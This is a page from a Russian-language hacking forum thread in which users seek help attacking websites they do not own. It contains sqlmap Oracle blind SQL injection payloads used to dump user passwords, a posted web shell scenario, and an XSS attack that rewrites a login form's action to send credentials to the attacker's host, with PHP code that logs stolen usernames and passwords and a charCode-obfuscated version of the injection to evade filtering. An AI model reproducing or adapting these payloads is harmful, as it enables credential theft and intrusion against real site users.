HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 42 из 296 « Первая < 32 38 39 40 41 42 43 44 45 46 5292142 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.07.2015, 15:35
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Цитата:
Сообщение от Pro100Nyan  
Pro100Nyan said:

Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini
Reverse IP не помогает?
 
Ответить с цитированием

  #2  
Старый 31.07.2015, 15:49
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
итак, ищем в гугле "IIRF.ini"

в первых 6 результатах видим:

Цитата:
Сообщение от None  
Installation of URL Rewriting module (IIRF) for IIS6/IIS7
вывод - IIS. ищем "iis configuration file"

находим: http://stackoverflow.com/questions/8...file-locations
 
Ответить с цитированием

  #3  
Старый 31.07.2015, 16:29
Pro100Nyan
Guest
Сообщений: n/a
Провел на форуме:
1367

Репутация: 0
По умолчанию
Цитата:
Сообщение от yarbabin  
yarbabin said:

итак, ищем в гугле "IIRF.ini"
в первых 6 результатах видим:
вывод - IIS. ищем "iis configuration file"
находим:
http://stackoverflow.com/questions/8...file-locations
К сожалению там нету такого файла, там одни только .dll файлы
 
Ответить с цитированием

  #4  
Старый 31.07.2015, 16:30
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию
Кто-нибудь может в личке помочь и глянуть один сайт? DB Oracle язвимость

Place: GET

Parameter: SL

Type: boolean-based blind

Title: Oracle boolean-based blind - GROUP BY and ORDER BY clauses

Payload: ...&SL=54,(SELECT (CASE WHEN (7590=7590) THEN 54 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Type: AND/OR time-based blind

Title: Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)

Payload: ....&SL=54,(SELECT (CASE WHEN (9646=9646) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(101)||CHR(9 7)||CHR(117),5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)

Всё выдётся отлично, вывод хороший, стабильный. Но вместо хеша или пароля в табличке юзоров выдаётся какая-то символьная фигня типа:

\x1c\x1f\x17\x18\x0ev\x1fjt\x15}

Притом это не на одном сайте, а на всех сайтах этой платформы.

Кто имеет время глянуть, напишите в личку, я скину урл. Очень важные для меня сайты на этой полатформе, я бьюсь в отчаянии, не знаю что делать. ПОМОГИТЕ!!!!!!

UPDATE: прогнала SQLMAP с режимом --binary-fields=PASSWORD, похоже, что пароли хранятся в бинарном виде. Выдаёт следующее:

157E02680F7F

1B0C130E197B620B7316

131E091001

171E0A0B057F620C7E12

00051D00087D6B087F17

171D1C0D0B676A08711D

0A00011F0A076F0F07600B0A

Что это за хеши такие? Oracle(DES)? или...? есть идеи?

PS можно платно
 
Ответить с цитированием

  #5  
Старый 03.08.2015, 12:02
djon
Guest
Сообщений: n/a
Провел на форуме:
2873

Репутация: 0
По умолчанию
Почему у меня ничего не записывает php?

------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------

Вставляю этот скрипт

------------------------------------------------------------------------------------------------------------

document.lsform.action=‘http://hosting.ru/base.php’

------------------------------------------------------------------------------------------------------------

в страницу где форма

------------------------------------------------------------------------------------------------------------



------------------------------------------------------------------------------------------------------------

И ничего не происходит,в чем может быть проблема?
 
Ответить с цитированием

  #6  
Старый 03.08.2015, 14:32
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию
Цитата:
Сообщение от djon  
djon said:

Почему у меня ничего не записывает php?
------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------
Вставляю этот скрипт
------------------------------------------------------------------------------------------------------------
document.lsform.action=‘
http://hosting.ru/base.php’
------------------------------------------------------------------------------------------------------------
в страницу где форма
------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------
И ничего не происходит,в чем может быть проблема?
Код:
Code:
$url = "";
$ls_username = $_POST['ls_username'];
$ls_password = $_POST['ls_password'];

if ($ls_username != null){
  if  ($ls_password != null) {
  $open=fopen('base.txt',"a");
  fwrite($open,"$ls_username;$ls_password\n");
  fclose($open);  
  }
}
 
Ответить с цитированием

  #7  
Старый 03.08.2015, 15:52
Genius Black
Guest
Сообщений: n/a
Провел на форуме:
1864

Репутация: 0
По умолчанию
Почему информация об ошибке выводиться только при .php?c=1 group by . Если указывать ' , union , by order или любые другие способы, то ничего не выводит?
 
Ответить с цитированием

  #8  
Старый 04.08.2015, 00:44
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от man474019  
man474019 said:

плиз, помогите с sqli
Нет инъекции. Только ошибка.
 
Ответить с цитированием

  #9  
Старый 04.08.2015, 08:44
djon
Guest
Сообщений: n/a
Провел на форуме:
2873

Репутация: 0
По умолчанию
Почему когда вставляю код (

document.getElementById('lsform').action="http://МойХостинг1.ru/base.php?";)

на сайт где есть активная xss,то она преобразуется так (УязвимыйСайт.ru/base.php)и пишет что "страница не найдена" а на втором моем хостинге где расположена копия сайта (УязвимыйСайт.ru/forum.php) по адрессу (http://МойХостинг2.ru) то логины и пароли идут нормально после нажатия на кнопку Вход,и после нажатия она переадресовывается на ("http://МойХостинг1.ru/base.php?")Почему с (УязвимыйСайт.ru/forum.php) не идут пароли ?
 
Ответить с цитированием

  #10  
Старый 04.08.2015, 12:56
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию
Попробуйте так. Может там нормализатор ссылок обрезает http://

Код:
Code:
String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 108, 115, 102, 111, 114, 109, 39, 41, 46, 97, 99, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 1052, 1086, 1081, 1061, 1086, 1089, 1090, 1080, 1085, 1075, 49, 46, 114, 117, 47, 98, 97, 115, 101, 46, 112, 104, 112, 63, 34, 59);
 
Ответить с цитированием
Ответ
Страница 42 из 296 « Первая < 32 38 39 40 41 42 43 44 45 46 5292142 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ